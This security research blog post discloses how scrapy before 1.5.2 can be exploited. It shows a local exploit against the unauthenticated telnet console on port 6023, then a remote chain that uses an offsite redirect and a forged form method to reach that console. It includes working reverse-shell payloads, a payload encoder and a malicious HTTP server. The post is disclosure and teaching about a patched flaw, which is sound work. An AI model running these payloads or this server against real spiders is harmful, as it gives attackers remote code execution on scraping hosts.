“Web scraping considered dangerous”: Exploiting the telnet service in scrapy < 1.5.2
Disclaimer: scrapy 1.5.2 was released on January 22nd; to avoid being exploited you must disable the telnet console (enabled by default) or upgrade to scrapy >= 1.5.2.
This year the focus of our research will be security in web scraping frameworks. Why? Because it’s important to us. As a little context: between 2012 and 2017 I worked at Scrapinghub, the world leader in web scraping, where I programmed more than 500 spiders. At alertot we use web spiders to get fresh vulnerabilities from several sources, so they are a core component of our stack.
We use scrapy daily, so most of the vulnerabilities will be related to it and its ecosystem, with the goal of improving its security, but we also want to explore web scraping frameworks in other languages.
Ok, let’s go with the new material!
Just to clarify, the vulnerabilities exposed in this post affect scrapy < 1.5.2. As mentioned in the changelog of scrapy 1.6.0, scrapy 1.5.2 introduced some security features in the telnet console, specifically authentication, which protects you from the vulnerabilities I’m going to reveal.
Debugging by default
Getting started with scrapy is easy. As you can see from the homepage, you can run your first spider in seconds, and the log shows information about enabled extensions, middlewares and other options. What has always caught my attention is the telnet service enabled by default.
[scrapy.middleware] INFO: Enabled extensions:
[scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
It’s the telnet console running on port 6023, whose purpose is to make debugging easier. Usually telnet services are restricted to a set of functions, but this console provides a Python shell in the context of the spider, which makes it powerful for debugging and interesting if someone gets access to it.
To be honest, it’s not common to turn to the telnet console. I’ve used it to debug spiders that were either running out of memory (in restricted environments) or taking forever, totalling around 5 out of 500+ spiders.
My concern was that the console was available without any authentication, so any local user could connect to the port and execute commands in the context of the user running the spider. The first proof of concept tries to exploit this local privilege escalation (LPE) bug.
An easy LPE
To demonstrate this exploitation, there are two requirements:
- The exploiter has access to the system.
- There’s a spider running and exposing the telnet service. The following spider meets this requirement, making an initial request and then idling.
Our exploit is simple: it defines a reverse shell, connects to the telnet service and sends a line that executes the reverse shell using Python’s os.system. I’ve created the next video to show this in action!
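For reference, such an exploit can be sketched with a raw socket; the reverse-shell command and attacker address are placeholders, and the default console address 127.0.0.1:6023 is assumed:

```python
import socket

def exploit(host='127.0.0.1', port=6023,
            shell="bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"):
    """Send one Python line to scrapy's unauthenticated telnet console.

    The pre-1.5.2 console evaluates every received line as Python inside
    the spider's process, so a single os.system call is enough.
    """
    line = 'import os; os.system("%s")\n' % shell
    with socket.create_connection((host, port)) as s:
        s.sendall(line.encode('utf-8'))
```

Calling exploit() while the spider is running executes the reverse shell as the user running the spider.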
Now, we’re going to begin our journey from this local exploitation to a remote one!
Taking control of spider’s requests
Below is a spider created by the command scrapy genspider example example.org.
It contains some class attributes and one of them is
allowed_domains . According to the documentation, it is defined as:
An optional list of strings containing domains that this spider is allowed to crawl. Requests for URLs not belonging to the domain names specified in this list (or their subdomains) won’t be followed if OffsiteMiddleware is enabled.
Then, if the spider tries to make a request to example.edu, the request will be filtered, as shown in the log:
[scrapy.spidermiddlewares.offsite] DEBUG: Filtered offsite request to 'example.edu': <GET http://example.edu>
However, an interesting behavior occurs when a request to a page in an allowed domain redirects to a disallowed domain: the redirected request won’t be filtered and will be processed by the spider.
That’s unintended behavior, but under security scrutiny it’s something. Imagine that there’s a dangerous.tld website and you want to create a spider that logs in to the user area. The server-side logic would be like this:
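A self-contained stand-in using only the standard library (the credentials user/secret are taken from the logs later in the post; the author likely used a web framework):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# stand-in for the login.html template served on /
LOGIN_FORM = (b'<html><body><form method="post" action="/login">'
              b'<input name="username"><input name="password" type="password">'
              b'<button type="submit">Log in</button></form></body></html>')

class SiteHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # route /: display the login form
        self._send(200, LOGIN_FORM)

    def do_POST(self):
        # route /login: check the submitted credentials
        length = int(self.headers.get('Content-Length', 0))
        form = parse_qs(self.rfile.read(length).decode())
        if form.get('username') == ['user'] and form.get('password') == ['secret']:
            self._send(200, b'Welcome!')
        else:
            self._send(403, b'Invalid credentials')

    def _send(self, code, body):
        self.send_response(code)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)
```

Serving it with HTTPServer(('', 80), SiteHandler).serve_forever() gives the spider a form to log in to.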
login.html, used on route /, displays a form with action=/login. A sample spider for the website would be:
An overview of the steps is:
- The spider sends a GET request to http://dangerous.tld/ at line 8.
- At line 11, it sends a FormRequest.from_response that automatically detects the form in the web page and sets the form values based on the formdata argument.
- At line 18 the spider prints that the authentication was successful.
Let’s run the spider:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (200) <POST http://dangerous.tld/login> (referer: http://dangerous.tld/)
[scrapy.core.engine] INFO: Closing spider (finished)
Everything is fine: the spider works and logs in successfully. But what if the website becomes a malicious actor?
Given the allowed_domains behavior described earlier, the malicious actor could make the spider send requests to domains of its interest. To demonstrate this, we will review the spider’s steps. The first step of our spider creates a GET request to /, which the home endpoint originally answers with the login page.
However, the website (now malicious) changes the logic to:
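A minimal stand-in for the malicious version, again using only the standard library, answers every request to / with a 302 off-site redirect:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class MaliciousHomeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # redirect the spider to a domain outside allowed_domains; the
        # offsite middleware won't filter the request that follows a redirect
        self.send_response(302)
        self.send_header('Location', 'http://example.org')
        self.end_headers()
```

Serving it with HTTPServer(('', 80), MaliciousHomeHandler).serve_forever() produces the 302 seen in the log.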
Running the spider again gives us the following output:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://example.org> from <GET http://dangerous.tld/>
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://example.org> (referer: None)
[scrapy.core.scraper] ERROR: Spider error processing <GET http://example.org> (referer: None)
Despite the error, the spider has indeed requested http://example.org with a GET request. Moreover, it’s also possible to redirect the POST request (with its body) created in step 2, using a redirect with code 307.
Actually, it’s a kind of SSRF that I’d name “Spider Side Request Forgery” (everyone wants to coin new terms 😃). It’s important to note some details about the environment:
- Usually a spider scrapes only one website, so it’s not common for a spider to be authenticated on another website/domain.
- The spider requests the URL, and there’s likely no way to get back the response (unlike a common SSRF).
- Until now, we can control only the full URL and maybe some part of the body in a POST request.
In spite of all these constraints, this kind of vulnerability, like SSRF, opens a new scope: the local network and localhost. Certainly we don’t know which services run on the local network, so the key question is: what is surely running on localhost, unauthenticated, and provides code execution capabilities? The telnet service!
Let’s speak telnet language
Now, we’re going to redirect the requests to http://localhost:6023.
Running the spider against this malicious actor gives us a lot of errors:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://localhost:6023> from <GET http://dangerous.tld/>
[scrapy.downloadermiddlewares.retry] DEBUG: Retrying <GET http://localhost:6023> (failed 1 times): [<twisted.python.failure.Failure twisted.web._newclient.ParseError: ('non-integer status code', b'\xff\xfd"\xff\xfd\x1f\xff\xfd\x03\xff\xfb\x01\x1bc>>> \x1b[4hGET / HTTP/1.1\r\r')
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly.
It seems that the number of errors equals the number of lines of our GET request (including headers), so we are reaching the telnet port but not sending valid Python lines. We need more control over the data we send, since the GET request line and headers don’t meet Python syntax. What about the body of the POST request sending the login credentials?
Let’s come back to the original version of the home route and try to exploit the login form logic.
Posting to telnet
The idea of using a POST request is to control the request’s body, as near its start as possible, in order to build a valid Python line. The formdata argument passed to FormRequest.from_response will update the form values, adding the new values at the end of the request’s body. That’s great: the malicious actor could instead add a hidden input to the form, and it would be at the start of the request’s body.
The request’s body sent by the spider starts with malicious=1; however, FormRequest.from_response URL-encodes every input, so it’s not possible to build a valid Python line.
Is it possible to send a POST request without an encoded body? Yes, using the plain Request class with method='POST' and a raw body. That’s the way to send POST requests with a JSON body, but I don’t consider it a realistic scenario in which the malicious actor could control the body of that request.
Something more to try? I know that the method should be one of a set of valid values (GET, POST, etc.), but let’s check whether scrapy enforces that. We’re going to change the form method to gaga and look at the spider’s output:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (405) <GAGA http://dangerous.tld/login?username=user&password=secret> (referer: http://dangerous.tld/)
It doesn’t validate that the form’s method is valid, good news! If I create an HTTP server supporting the GAGA method, I can send a redirect to localhost:6023/payload, and this new request with the GAGA method will reach the telnet service. There’s hope for us!
Creating the Python line
The idea is to create a valid line and then try to comment out the remainder of the line. Taking into account how an HTTP request is built, and the idea of a custom HTTP server, the line sent to the telnet console eventually will be:
GAGA /payload HTTP/1.1
As seen in the previous output, scrapy has uppercased my method GAGA, so I can’t immediately inject Python code because it would be invalid. As the method always comes first, the only option I saw was to use a method like GET =' to create a valid string variable, then put the closing apostrophe in the URI and start my Python code there.
GET =' /';mypayload; HTTP/1.1
The payload is Python code and can be separated by semicolons. Commenting out the remainder of the line after the payload is not possible, since scrapy deletes the # character. The remainder is HTTP/1.1, so if I declare HTTP as a float, it becomes a valid division and won’t raise any exception. The final line would look like this:
GET =' /';payload;HTTP=2.0; HTTP/1.1
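We can verify that such a line is valid Python, with a harmless print standing in for the payload:

```python
# the crafted request line, with a harmless stand-in payload
line = "GET =' /';print('pwned');HTTP=2.0; HTTP/1.1"

# compile() raises SyntaxError if the telnet console would reject the line
compile(line, '<telnet>', 'exec')

namespace = {}
exec(line, namespace)  # GET holds a string, HTTP/1.1 is just the division 2.0/1.1
```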
Gluing everything together
The payload section is special:
- It can’t contain any space.
- The scope is limited, i.e. the variable GET doesn’t exist in the payload’s scope.
- Some characters, like #, are deleted.
Taking these limitations into consideration, we’re going to build our payload like this:
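A sketch following that description; the reverse-shell command and attacker address are placeholders:

```python
import base64

# line 1: the reverse shell we want executed (attacker host/port are placeholders)
reverse_shell = "bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"

# line 2: base64-encode it so the command travels without any space
encoded = base64.b64encode(reverse_shell.encode()).decode()

# __import__ brings in os and base64 without an import statement or spaces
payload = ("__import__('os').system(__import__('base64')"
           ".b64decode('%s').decode())" % encoded)

assert ' ' not in payload  # the URI part of the request line can't contain spaces
```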
At line 1 we define our reverse shell, at line 2 we encode it in base64, and we use the magic function __import__ to import the os and base64 modules that eventually allow us to execute our reverse shell as a command.
Now, we have to create a web server capable of handling this special GET =' method. Since popular frameworks don’t allow that (at least not easily), as in the XXE exploitation, I had to hack the BaseHTTPRequestHandler class from the http module to serve both the valid GET and the invalid GET =' requests. The custom web server is below:
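A compressed, self-contained sketch of the same idea (the author’s version overrides more of handle_one_request; the reverse shell, ports and detection heuristic are assumptions):

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer

# placeholder reverse shell (attacker host/port)
REVERSE_SHELL = "bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"

# the login form declares the special method, so the spider copies it verbatim
LOGIN_PAGE = (b'<html><body><form method="GET =\'" action="/login">'
              b'<input name="username"><input name="password" type="password">'
              b'</form></body></html>')

def telnet_location():
    encoded = base64.b64encode(REVERSE_SHELL.encode()).decode()
    payload = ("__import__('os').system(__import__('base64')"
               ".b64decode('%s').decode())" % encoded)
    # the closing apostrophe ends the GET =' string; HTTP=2.0 keeps HTTP/1.1 valid
    return "http://localhost:6023/';%s;HTTP=2.0;" % payload

class MaliciousHandler(BaseHTTPRequestHandler):
    def handle_one_request(self):
        # bypass the parent's strict parsing so the invalid "GET ='" is accepted
        self.raw_requestline = self.rfile.readline(65537)
        if not self.raw_requestline:
            self.close_connection = True
            return
        self.request_version = 'HTTP/1.1'
        requestline = self.raw_requestline.decode('latin-1')
        if 'username' in requestline:
            # form submitted: 307 preserves the invalid method on redirect
            self.send_response_only(307)
            self.send_header('Location', telnet_location())
            self.end_headers()
        else:
            self.send_response_only(200)
            self.send_header('Content-Type', 'text/html')
            self.send_header('Content-Length', str(len(LOGIN_PAGE)))
            self.end_headers()
            self.wfile.write(LOGIN_PAGE)
        self.close_connection = True
```

Serving it with HTTPServer(('', 80), MaliciousHandler).serve_forever() answers plain GETs with the booby-trapped form and redirects any form submission to the telnet console.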
The important pieces are:
- Line 11 serves the malicious_login.html template when the server receives the GET request to the endpoint /. What’s different in this malicious_login.html file? Our special method!
- Line 33 is the start of the method handle_one_request from the parent class. It’s almost the same, except that at line 52 we detect that the form was sent (by seeing that there’s a username string in the URI).
- At line 18, we define our malicious logic. First, we set a 307 redirect code so that our weird method is kept unchanged. Then, we build our payload and send a Location header to the spider so that it hits the telnet service.
Let’s see this in action!
After this unexpected exploitation, I’m going to create some issues on Github to address the unfiltered redirections and the invalid form methods.
I really liked the decision taken in scrapy 1.5.2: they added authentication to the telnet service with a user/password, and if the password is not set, they create a random, secure one. It’s not optional security, it’s security by design.
I hope you enjoyed this post and stay tuned for the following part of this research!